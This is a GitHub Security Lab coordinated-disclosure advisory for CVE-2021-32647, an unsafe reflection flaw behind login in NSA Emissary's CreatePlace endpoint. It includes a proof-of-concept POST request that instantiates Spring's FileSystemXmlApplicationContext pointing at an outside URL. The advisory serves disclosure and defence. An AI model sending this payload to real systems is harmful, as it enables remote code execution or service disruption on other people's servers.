GHSL-2021-073: Post-authentication unsafe reflection in NSA Emissary - CVE-2021-32647

Coordinated Disclosure Timeline

• 2021-04-27: Report sent to EmissarySupport@evoforge.org
• 2021-05-28: Advisory is published

Summary

A logged-in user can invoke the constructor of some classes with untrusted data.

Product

National Security Agency Emissary

Tested Version

6.4.0

Details

The CreatePlace REST endpoint accepts an sppClassName parameter which is used to load an arbitrary class. This class is later instantiated using a constructor with the following signature: <constructor>(String, String, String). An attacker may find a gadget (class) in the application classpath that could be used to achieve Remote Code Execution (RCE) or disrupt the application.

POST /emissary/CreatePlace.action HTTP/1.1
Host: localhost:8001
x-requested-by: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 142

sppClassName=org.springframework.context.support.FileSystemXmlApplicationContext&sppLocation=bar.bar.bar.http%3A%2F%2Fbar.com&sppDirectory=foo

Impact

Even though the chances to find a gadget (class) that allow arbitrary code execution are low, an attacker can still find gadgets that could potentially crash the application or leak sensitive data.

CVE

• CVE-2021-32647

Resources

• https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-ph73-7v9r-wg32

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-073 in any communication regarding this issue.